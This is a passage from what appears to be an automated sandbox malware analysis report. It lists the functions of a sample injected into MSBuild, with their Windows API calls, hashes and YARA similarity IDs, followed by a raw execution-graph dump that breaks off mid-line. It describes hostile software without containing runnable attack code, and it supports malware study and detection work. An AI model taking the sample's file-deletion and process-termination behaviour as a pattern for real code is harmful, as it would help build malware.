                                                                                                                                            • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                                            • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                                            • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                                            Function 0040AF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DeleteDirectoryFileRemove
                                                                                                                                            • String ID: pth_unenc
                                                                                                                                            • API String ID: 3325800564-4028850238
                                                                                                                                            • Opcode ID: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                                                            • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                                                            • Opcode Fuzzy Hash: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                                                            • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                                                            Function 00411699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                            • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ObjectProcessSingleTerminateWait
                                                                                                                                            • String ID: pth_unenc
                                                                                                                                            • API String ID: 1872346434-4028850238
                                                                                                                                            • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                                            • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                                                            • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                                            • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                                                            Function 10007103 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CommandLine
                                                                                                                                            • String ID: x7
                                                                                                                                            • API String ID: 3253501508-374306512
                                                                                                                                            • Opcode ID: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                                                                                                                                            • Instruction ID: 64725d3052c2c9ae7bbd7e52e8b3a5750bb25634a918b02f39acb7dc5bcd530d
                                                                                                                                            • Opcode Fuzzy Hash: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                                                                                                                                            • Instruction Fuzzy Hash: C0B00278C012209FE744AF7499DC2487FB0B758752B90D8AFD51AD2764D635C047EF20
                                                                                                                                            Function 0044E0EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CommandLine
                                                                                                                                            • String ID: x7
                                                                                                                                            • API String ID: 3253501508-374306512
                                                                                                                                            • Opcode ID: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                                                                                                            • Instruction ID: 13d69598d350970c9b91df73096b24a53109b9b907d0ea4b726438dfa3130670
                                                                                                                                            • Opcode Fuzzy Hash: 2702c5f118dd3839dbc4dd886e2cdb728e5ea39e06e223ea52f31eba807d30e7
                                                                                                                                            • Instruction Fuzzy Hash: 09B0027D8157009FC7419F79BD5D1443BA0B75861339094B5DC19C7B35DA358085EF18
                                                                                                                                            Function 0043FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                                                            • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1717984340-0
                                                                                                                                            • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                                                            • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                                                            • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                                                            • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:6.3%
                                                                                                                                            Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                            Signature Coverage:0.8%
                                                                                                                                            Total number of Nodes:2000
                                                                                                                                            Total number of Limit Nodes:63
                                                                                                                                            execution_graph 40382 441a73 147 API calls 40699 441819 40702 430737 40699->40702 40701 441825 40703 430756 40702->40703 40715 43076d 40702->40715 40704 430774 40703->40704 40705 43075f 40703->40705 40707 43034a memcpy 40704->40707 40723 4169a7 11 API calls 40705->40723 40710 43077e 40707->40710 40708 4307ce 40709 430819 memset 40708->40709 40716 415b2c 40708->40716 40709->40715 40710->40708 40713 4307fa 40710->40713 40710->40715 40712 4307e9 40712->40709 40712->40715 40724 4169a7 11 API calls 40713->40724 40715->40701 40717 415b46 40716->40717 40718 415b42 40716->40718 40717->40712 40718->40717 40719 415b94 40718->40719 40721 415b5a 40718->40721 40720 4438b5 10 API calls 40719->40720 40720->40717 40721->40717 40722 415b79 memcpy 40721->40722 40722->40717 40723->40715 40724->40715 37672 442ec6 19 API calls 37849 4152c6 malloc 37850 4152e2 37849->37850 37851 4152ef 37849->37851 37853 416760 11 API calls 37851->37853 37853->37850 38476 4466f4 38495 446904 38476->38495 38478 446700 GetModuleHandleA 38481 446710 __set_app_type __p__fmode __p__commode 38478->38481 38480 4467a4 38482 4467ac __setusermatherr 38480->38482 38483 4467b8 38480->38483 38481->38480 38482->38483 38496 4468f0 _controlfp 38483->38496 38485 4467bd _initterm __wgetmainargs _initterm 38487 44681e GetStartupInfoW 38485->38487 38488 446810 38485->38488 38489 446866 GetModuleHandleA 38487->38489 38497 41276d 38489->38497 38493 446896 exit 38494 44689d _cexit 38493->38494 38494->38488 38495->38478 38496->38485 38498 41277d 38497->38498 38540 4044a4 LoadLibraryW 38498->38540 38500 412785 38531 412789 38500->38531 38548 414b81 38500->38548 38503 4127c8 38554 412465 memset ??2@YAPAXI 38503->38554 38505 4127ea 38566 40ac21 38505->38566 38510 412813 38584 40dd07 memset 38510->38584 38511 412827 38589 40db69 memset 38511->38589 38515 412822 38610 4125b6 ??3@YAXPAX 38515->38610 38516 40ada2 _wcsicmp 38517 41283d 38516->38517 38517->38515 38520 412863 CoInitialize 38517->38520 38594 41268e 38517->38594 38614 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38520->38614 38524 41296f 38616 40b633 38524->38616 38526 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38532 412957 CoUninitialize 38526->38532 38537 4128ca 38526->38537 38531->38493 38531->38494 38532->38515 38533 4128d0 TranslateAcceleratorW 38534 412941 GetMessageW 38533->38534 38533->38537 38534->38532 38534->38533 38535 412909 IsDialogMessageW 38535->38534 38535->38537 38536 4128fd IsDialogMessageW 38536->38534 38536->38535 38537->38533 38537->38535 38537->38536 38538 41292b TranslateMessage DispatchMessageW 38537->38538 38539 41291f IsDialogMessageW 38537->38539 38538->38534 38539->38534 38539->38538 38541 4044cf GetProcAddress 38540->38541 38544 4044f7 38540->38544 38542 4044e8 FreeLibrary 38541->38542 38545 4044df 38541->38545 38543 4044f3 38542->38543 38542->38544 38543->38544 38546 404507 MessageBoxW 38544->38546 38547 40451e 38544->38547 38545->38542 38546->38500 38547->38500 38549 414b8a 38548->38549 38550 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38548->38550 38620 40a804 memset 38549->38620 38550->38503 38553 414b9e GetProcAddress 38553->38550 38555 4124e0 38554->38555 38556 412505 ??2@YAPAXI 38555->38556 38557 41251c 38556->38557 38559 412521 38556->38559 38642 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38557->38642 38631 444722 38559->38631 38565 41259b wcscpy 38565->38505 38647 40b1ab free free 38566->38647 38570 40a9ce malloc memcpy free free 38577 40ac5c 38570->38577 38571 40ad4b 38579 40ad76 38571->38579 38671 40a9ce 38571->38671 38573 40ace7 free 38573->38577 38577->38570 38577->38571 38577->38573 38577->38579 38651 40a8d0 38577->38651 38663 4099f4 38577->38663 38578 40a8d0 7 API calls 38578->38579 38648 40aa04 38579->38648 38580 40ada2 38581 40adc9 38580->38581 38582 40adaa 38580->38582 38581->38510 38581->38511 38582->38581 38583 40adb3 _wcsicmp 38582->38583 38583->38581 38583->38582 38676 40dce0 38584->38676 38586 40dd3a GetModuleHandleW 38681 40dba7 38586->38681 38590 40dce0 3 API calls 38589->38590 38591 40db99 38590->38591 38753 40dae1 38591->38753 38767 402f3a 38594->38767 38596 412766 38596->38515 38596->38520 38597 4126d3 _wcsicmp 38598 4126a8 38597->38598 38598->38596 38598->38597 38600 41270a 38598->38600 38802 4125f8 7 API calls 38598->38802 38600->38596 38770 411ac5 38600->38770 38611 4125da 38610->38611 38612 4125f0 38611->38612 38613 4125e6 DeleteObject 38611->38613 38615 40b1ab free free 38612->38615 38613->38612 38614->38526 38615->38524 38617 40b640 38616->38617 38618 40b639 free 38616->38618 38619 40b1ab free free 38617->38619 38618->38617 38619->38531 38621 40a83b GetSystemDirectoryW 38620->38621 38622 40a84c wcscpy 38620->38622 38621->38622 38627 409719 wcslen 38622->38627 38625 40a881 LoadLibraryW 38626 40a886 38625->38626 38626->38550 38626->38553 38628 409724 38627->38628 38629 409739 wcscat LoadLibraryW 38627->38629 38628->38629 38630 40972c wcscat 38628->38630 38629->38625 38629->38626 38630->38629 38632 444732 38631->38632 38633 444728 DeleteObject 38631->38633 38643 409cc3 38632->38643 38633->38632 38635 412551 38636 4010f9 38635->38636 38637 401130 38636->38637 38638 401134 GetModuleHandleW LoadIconW 38637->38638 38639 401107 wcsncat 38637->38639 38640 40a7be 38638->38640 38639->38637 38641 40a7d2 38640->38641 38641->38565 38641->38641 38642->38559 38646 409bfd memset wcscpy 38643->38646 38645 409cdb CreateFontIndirectW 38645->38635 38646->38645 38647->38577 38649 40aa14 38648->38649 38650 40aa0a free 38648->38650 38649->38580 38650->38649 38652 40a8eb 38651->38652 38653 40a8df wcslen 38651->38653 38654 40a906 free 38652->38654 38655 40a90f 38652->38655 38653->38652 38657 40a919 38654->38657 38656 4099f4 3 API calls 38655->38656 38656->38657 38658 40a932 38657->38658 38659 40a929 free 38657->38659 38661 4099f4 3 API calls 38658->38661 38660 40a93e memcpy 38659->38660 38660->38577 38662 40a93d 38661->38662 38662->38660 38664 409a41 38663->38664 38665 4099fb malloc 38663->38665 38664->38577 38667 409a37 38665->38667 38668 409a1c 38665->38668 38667->38577 38669 409a30 free 38668->38669 38670 409a20 memcpy 38668->38670 38669->38667 38670->38669 38672 40a9e7 38671->38672 38673 40a9dc free 38671->38673 38675 4099f4 3 API calls 38672->38675 38674 40a9f2 38673->38674 38674->38578 38675->38674 38700 409bca GetModuleFileNameW 38676->38700 38678 40dce6 wcsrchr 38679 40dcf5 38678->38679 38680 40dcf9 wcscat 38678->38680 38679->38680 38680->38586 38701 44db70 38681->38701 38685 40dbfd 38704 4447d9 38685->38704 38688 40dc34 wcscpy wcscpy 38730 40d6f5 38688->38730 38689 40dc1f wcscpy 38689->38688 38692 40d6f5 3 API calls 38693 40dc73 38692->38693 38694 40d6f5 3 API calls 38693->38694 38695 40dc89 38694->38695 38696 40d6f5 3 API calls 38695->38696 38697 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38696->38697 38736 40da80 38697->38736 38700->38678 38702 40dbb4 memset memset 38701->38702 38703 409bca GetModuleFileNameW 38702->38703 38703->38685 38706 4447f4 38704->38706 38705 40dc1b 38705->38688 38705->38689 38706->38705 38707 444807 ??2@YAPAXI 38706->38707 38708 44481f 38707->38708 38709 444873 _snwprintf 38708->38709 38710 4448ab wcscpy 38708->38710 38743 44474a 8 API calls 38709->38743 38712 4448bb 38710->38712 38744 44474a 8 API calls 38712->38744 38713 4448a7 38713->38710 38713->38712 38715 4448cd 38745 44474a 8 API calls 38715->38745 38717 4448e2 38746 44474a 8 API calls 38717->38746 38719 4448f7 38747 44474a 8 API calls 38719->38747 38721 44490c 38748 44474a 8 API calls 38721->38748 38723 444921 38749 44474a 8 API calls 38723->38749 38725 444936 38750 44474a 8 API calls 38725->38750 38727 44494b 38751 44474a 8 API calls 38727->38751 38729 444960 ??3@YAXPAX 38729->38705 38731 44db70 38730->38731 38732 40d702 memset GetPrivateProfileStringW 38731->38732 38733 40d752 38732->38733 38734 40d75c WritePrivateProfileStringW 38732->38734 38733->38734 38735 40d758 38733->38735 38734->38735 38735->38692 38737 44db70 38736->38737 38738 40da8d memset 38737->38738 38739 40daac LoadStringW 38738->38739 38740 40dac6 38739->38740 38740->38739 38742 40dade 38740->38742 38752 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38740->38752 38742->38515 38743->38713 38744->38715 38745->38717 38746->38719 38747->38721 38748->38723 38749->38725 38750->38727 38751->38729 38752->38740 38763 409b98 GetFileAttributesW 38753->38763 38755 40daea 38756 40db63 38755->38756 38757 40daef wcscpy wcscpy GetPrivateProfileIntW 38755->38757 38756->38516 38764 40d65d GetPrivateProfileStringW 38757->38764 38759 40db3e 38765 40d65d GetPrivateProfileStringW 38759->38765 38761 40db4f 38766 40d65d GetPrivateProfileStringW 38761->38766 38763->38755 38764->38759 38765->38761 38766->38756 38803 40eaff 38767->38803 38771 411ae2 memset 38770->38771 38772 411b8f 38770->38772 38843 409bca GetModuleFileNameW 38771->38843 38784 411a8b 38772->38784 38774 411b0a wcsrchr 38775 411b22 wcscat 38774->38775 38776 411b1f 38774->38776 38844 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38775->38844 38776->38775 38778 411b67 38845 402afb 38778->38845 38782 411b7f 38901 40ea13 SendMessageW memset SendMessageW 38782->38901 38785 402afb 27 API calls 38784->38785 38786 411ac0 38785->38786 38787 4110dc 38786->38787 38788 41113e 38787->38788 38793 4110f0 38787->38793 38926 40969c LoadCursorW SetCursor 38788->38926 38790 411143 38927 444a54 38790->38927 38930 40b1ab free free 38790->38930 38931 4032b4 38790->38931 38791 4110f7 _wcsicmp 38791->38793 38792 411157 38794 40ada2 _wcsicmp 38792->38794 38793->38788 38793->38791 38949 410c46 10 API calls 38793->38949 38797 411167 38794->38797 38795 4111af 38797->38795 38798 4111a6 qsort 38797->38798 38798->38795 38802->38598 38804 40eb10 38803->38804 38816 40e8e0 38804->38816 38807 40eb6c memcpy memcpy 38808 40ebb7 38807->38808 38808->38807 38809 40ebf2 ??2@YAPAXI ??2@YAPAXI 38808->38809 38812 40d134 16 API calls 38808->38812 38810 40ec2e ??2@YAPAXI 38809->38810 38813 40ec65 38809->38813 38810->38813 38812->38808 38813->38813 38826 40ea7f 38813->38826 38815 402f49 38815->38598 38817 40e8f2 38816->38817 38818 40e8eb ??3@YAXPAX 38816->38818 38819 40e900 38817->38819 38820 40e8f9 ??3@YAXPAX 38817->38820 38818->38817 38821 40e911 38819->38821 38822 40e90a ??3@YAXPAX 38819->38822 38820->38819 38823 40e931 ??2@YAPAXI ??2@YAPAXI 38821->38823 38824 40e921 ??3@YAXPAX 38821->38824 38825 40e92a ??3@YAXPAX 38821->38825 38822->38821 38823->38807 38824->38825 38825->38823 38827 40aa04 free 38826->38827 38828 40ea88 38827->38828 38829 40aa04 free 38828->38829 38830 40ea90 38829->38830 38831 40aa04 free 38830->38831 38832 40ea98 38831->38832 38833 40aa04 free 38832->38833 38834 40eaa0 38833->38834 38835 40a9ce 4 API calls 38834->38835 38836 40eab3 38835->38836 38837 40a9ce 4 API calls 38836->38837 38838 40eabd 38837->38838 38839 40a9ce 4 API calls 38838->38839 38840 40eac7 38839->38840 38841 40a9ce 4 API calls 38840->38841 38842 40ead1 38841->38842 38842->38815 38843->38774 38844->38778 38902 40b2cc 38845->38902 38847 402b0a 38848 40b2cc 27 API calls 38847->38848 38849 402b23 38848->38849 38850 40b2cc 27 API calls 38849->38850 38851 402b3a 38850->38851 38852 40b2cc 27 API calls 38851->38852 38853 402b54 38852->38853 38854 40b2cc 27 API calls 38853->38854 38855 402b6b 38854->38855 38856 40b2cc 27 API calls 38855->38856 38857 402b82 38856->38857 38858 40b2cc 27 API calls 38857->38858 38859 402b99 38858->38859 38860 40b2cc 27 API calls 38859->38860 38861 402bb0 38860->38861 38862 40b2cc 27 API calls 38861->38862 38863 402bc7 38862->38863 38864 40b2cc 27 API calls 38863->38864 38865 402bde 38864->38865 38866 40b2cc 27 API calls 38865->38866 38867 402bf5 38866->38867 38868 40b2cc 27 API calls 38867->38868 38869 402c0c 38868->38869 38870 40b2cc 27 API calls 38869->38870 38871 402c23 38870->38871 38872 40b2cc 27 API calls 38871->38872 38873 402c3a 38872->38873 38874 40b2cc 27 API calls 38873->38874 38875 402c51 38874->38875 38876 40b2cc 27 API calls 38875->38876 38877 402c68 38876->38877 38878 40b2cc 27 API calls 38877->38878 38879 402c7f 38878->38879 38880 40b2cc 27 API calls 38879->38880 38881 402c99 38880->38881 38882 40b2cc 27 API calls 38881->38882 38883 402cb3 38882->38883 38884 40b2cc 27 API calls 38883->38884 38885 402cd5 38884->38885 38886 40b2cc 27 API calls 38885->38886 38887 402cf0 38886->38887 38888 40b2cc 27 API calls 38887->38888 38889 402d0b 38888->38889 38890 40b2cc 27 API calls 38889->38890 38891 402d26 38890->38891 38892 40b2cc 27 API calls 38891->38892 38893 402d3e 38892->38893 38894 40b2cc 27 API calls 38893->38894 38895 402d59 38894->38895 38896 40b2cc 27 API calls 38895->38896 38897 402d78 38896->38897 38898 40b2cc 27 API calls 38897->38898 38899 402d93 38898->38899 38900 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38899->38900 38900->38782 38901->38772 38905 40b58d 38902->38905 38904 40b2d1 38904->38847 38906 40b5a4 GetModuleHandleW FindResourceW 38905->38906 38907 40b62e 38905->38907 38908 40b5c2 LoadResource 38906->38908 38909 40b5e7 38906->38909 38907->38904 38908->38909 38910 40b5d0 SizeofResource LockResource 38908->38910 38909->38907 38918 40afcf 38909->38918 38910->38909 38912 40b608 memcpy 38921 40b4d3 memcpy 38912->38921 38914 40b61e 38922 40b3c1 18 API calls 38914->38922 38916 40b626 38923 40b04b 38916->38923 38919 40b04b ??3@YAXPAX 38918->38919 38920 40afd7 ??2@YAPAXI 38919->38920 38920->38912 38921->38914 38922->38916 38924 40b051 ??3@YAXPAX 38923->38924 38925 40b05f 38923->38925 38924->38925 38925->38907 38926->38790 38928 444a64 FreeLibrary 38927->38928 38929 444a83 38927->38929 38928->38929 38929->38792 38930->38792 38932 4032c4 38931->38932 38933 40b633 free 38932->38933 38934 403316 38933->38934 38950 44553b 38934->38950 38938 403480 39148 40368c 15 API calls 38938->39148 38940 403489 38941 40b633 free 38940->38941 38942 403495 38941->38942 38942->38792 38943 4033a9 memset memcpy 38944 4033ec wcscmp 38943->38944 38945 40333c 38943->38945 38944->38945 38945->38938 38945->38943 38945->38944 39146 4028e7 11 API calls 38945->39146 39147 40f508 6 API calls 38945->39147 38947 403421 _wcsicmp 38947->38945 38949->38793 38951 445548 38950->38951 38952 445599 38951->38952 39149 40c768 38951->39149 38953 4455a8 memset 38952->38953 38960 4457f2 38952->38960 39232 403988 38953->39232 38964 445854 38960->38964 39334 403e2d memset memset memset memset memset 38960->39334 38961 445672 39243 403fbe memset memset memset memset memset 38961->39243 38962 4458bb memset memset 38969 414c2e 16 API calls 38962->38969 39015 4458aa 38964->39015 39357 403c9c memset memset memset memset memset 38964->39357 38967 44595e memset memset 38974 414c2e 16 API calls 38967->38974 38968 4455e5 38968->38961 38977 44560f 38968->38977 38970 4458f9 38969->38970 38975 40b2cc 27 API calls 38970->38975 38972 445a00 memset memset 39380 414c2e 38972->39380 38973 445b22 38979 445bca 38973->38979 38980 445b38 memset memset memset 38973->38980 38984 44599c 38974->38984 38985 445909 38975->38985 38989 4087b3 338 API calls 38977->38989 38978 445849 39445 40b1ab free free 38978->39445 38986 445c8b memset memset 38979->38986 39054 445cf0 38979->39054 38990 445bd4 38980->38990 38991 445b98 38980->38991 38994 40b2cc 27 API calls 38984->38994 38995 409d1f 6 API calls 38985->38995 38998 414c2e 16 API calls 38986->38998 38988 44589f 39446 40b1ab free free 38988->39446 38996 445621 38989->38996 39004 414c2e 16 API calls 38990->39004 38991->38990 39000 445ba2 38991->39000 38997 4459ac 38994->38997 39008 445919 38995->39008 39431 4454bf 20 API calls 38996->39431 39010 409d1f 6 API calls 38997->39010 39011 445cc9 38998->39011 39518 4099c6 wcslen 39000->39518 39001 4456b2 39003 40b2cc 27 API calls 39016 445a4f 39003->39016 39018 445be2 39004->39018 39005 403335 39145 4452e5 45 API calls 39005->39145 39006 445d3d 39038 40b2cc 27 API calls 39006->39038 39007 445d88 memset memset memset 39021 414c2e 16 API calls 39007->39021 39447 409b98 GetFileAttributesW 39008->39447 39009 445823 39009->38978 39020 4087b3 338 API calls 39009->39020 39022 4459bc 39010->39022 39023 409d1f 6 API calls 39011->39023 39013 445879 39013->38988 39034 4087b3 338 API calls 39013->39034 39015->38962 39039 44594a 39015->39039 39395 409d1f wcslen wcslen 39016->39395 39027 40b2cc 27 API calls 39018->39027 39020->39009 39031 445dde 39021->39031 39514 409b98 GetFileAttributesW 39022->39514 39033 445ce1 39023->39033 39024 445bb3 39521 445403 memset 39024->39521 39025 445680 39025->39001 39266 4087b3 memset 39025->39266 39028 445bf3 39027->39028 39037 409d1f 6 API calls 39028->39037 39029 445928 39029->39039 39448 40b6ef 39029->39448 39040 40b2cc 27 API calls 39031->39040 39538 409b98 GetFileAttributesW 39033->39538 39034->39013 39048 445c07 39037->39048 39049 445d54 _wcsicmp 39038->39049 39039->38967 39053 4459ed 39039->39053 39052 445def 39040->39052 39041 4459cb 39041->39053 39062 40b6ef 252 API calls 39041->39062 39045 40b2cc 27 API calls 39046 445a94 39045->39046 39400 40ae18 39046->39400 39047 44566d 39047->38960 39317 413d4c 39047->39317 39058 445389 258 API calls 39048->39058 39059 445d71 39049->39059 39124 445d67 39049->39124 39051 445665 39432 40b1ab free free 39051->39432 39060 409d1f 6 API calls 39052->39060 39053->38972 39053->38973 39054->39005 39054->39006 39054->39007 39055 445389 258 API calls 39055->38979 39064 445c17 39058->39064 39539 445093 23 API calls 39059->39539 39067 445e03 39060->39067 39062->39053 39063 4456d8 39069 40b2cc 27 API calls 39063->39069 39070 40b2cc 27 API calls 39064->39070 39066 44563c 39066->39051 39072 4087b3 338 API calls 39066->39072 39540 409b98 GetFileAttributesW 39067->39540 39068 40b6ef 252 API calls 39068->39005 39074 4456e2 39069->39074 39075 445c23 39070->39075 39071 445d83 39071->39005 39072->39066 39434 413fa6 _wcsicmp _wcsicmp 39074->39434 39079 409d1f 6 API calls 39075->39079 39077 445e12 39084 445e6b 39077->39084 39090 40b2cc 27 API calls 39077->39090 39082 445c37 39079->39082 39080 445aa1 39083 445b17 39080->39083 39098 445ab2 memset 39080->39098 39111 409d1f 6 API calls 39080->39111 39407 40add4 39080->39407 39412 445389 39080->39412 39421 40ae51 39080->39421 39081 4456eb 39086 4456fd memset memset memset memset 39081->39086 39087 4457ea 39081->39087 39088 445389 258 API calls 39082->39088 39515 40aebe 39083->39515 39542 445093 23 API calls 39084->39542 39435 409c70 wcscpy wcsrchr 39086->39435 39438 413d29 39087->39438 39093 445c47 39088->39093 39094 445e33 39090->39094 39100 40b2cc 27 API calls 39093->39100 39101 409d1f 6 API calls 39094->39101 39096 445e7e 39097 445f67 39096->39097 39106 40b2cc 27 API calls 39097->39106 39102 40b2cc 27 API calls 39098->39102 39104 445c53 39100->39104 39105 445e47 39101->39105 39102->39080 39103 409c70 2 API calls 39107 44577e 39103->39107 39108 409d1f 6 API calls 39104->39108 39541 409b98 GetFileAttributesW 39105->39541 39110 445f73 39106->39110 39112 409c70 2 API calls 39107->39112 39113 445c67 39108->39113 39115 409d1f 6 API calls 39110->39115 39111->39080 39116 44578d 39112->39116 39117 445389 258 API calls 39113->39117 39114 445e56 39114->39084 39120 445e83 memset 39114->39120 39118 445f87 39115->39118 39116->39087 39123 40b2cc 27 API calls 39116->39123 39117->38979 39545 409b98 GetFileAttributesW 39118->39545 39122 40b2cc 27 API calls 39120->39122 39125 445eab 39122->39125 39126 4457a8 39123->39126 39124->39005 39124->39068 39127 409d1f 6 API calls 39125->39127 39128 409d1f 6 API calls 39126->39128 39129 445ebf 39127->39129 39130 4457b8 39128->39130 39131 40ae18 9 API calls 39129->39131 39141 445ef5 39131->39141 39134 40ae51 9 API calls 39134->39141 39136 445f5c 39138 40aebe FindClose 39136->39138 39137 40add4 2 API calls 39137->39141 39138->39097 39139 40b2cc 27 API calls 39139->39141 39140 409d1f 6 API calls 39140->39141 39141->39134 39141->39136 39141->39137 39141->39139 39141->39140 39143 445f3a 39141->39143 39543 409b98 GetFileAttributesW 39141->39543 39544 445093 23 API calls 39143->39544 39145->38945 39146->38947 39147->38945 39148->38940 39150 40c775 39149->39150 39546 40b1ab free free 39150->39546 39152 40c788 39547 40b1ab free free 39152->39547 39154 40c790 39548 40b1ab free free 39154->39548 39156 40c798 39157 40aa04 free 39156->39157 39158 40c7a0 39157->39158 39549 40c274 memset 39158->39549 39163 40a8ab 9 API calls 39164 40c7c3 39163->39164 39165 40a8ab 9 API calls 39164->39165 39166 40c7d0 39165->39166 39578 40c3c3 39166->39578 39170 40c7e5 39171 40c877 39170->39171 39172 40c86c 39170->39172 39178 40c634 49 API calls 39170->39178 39603 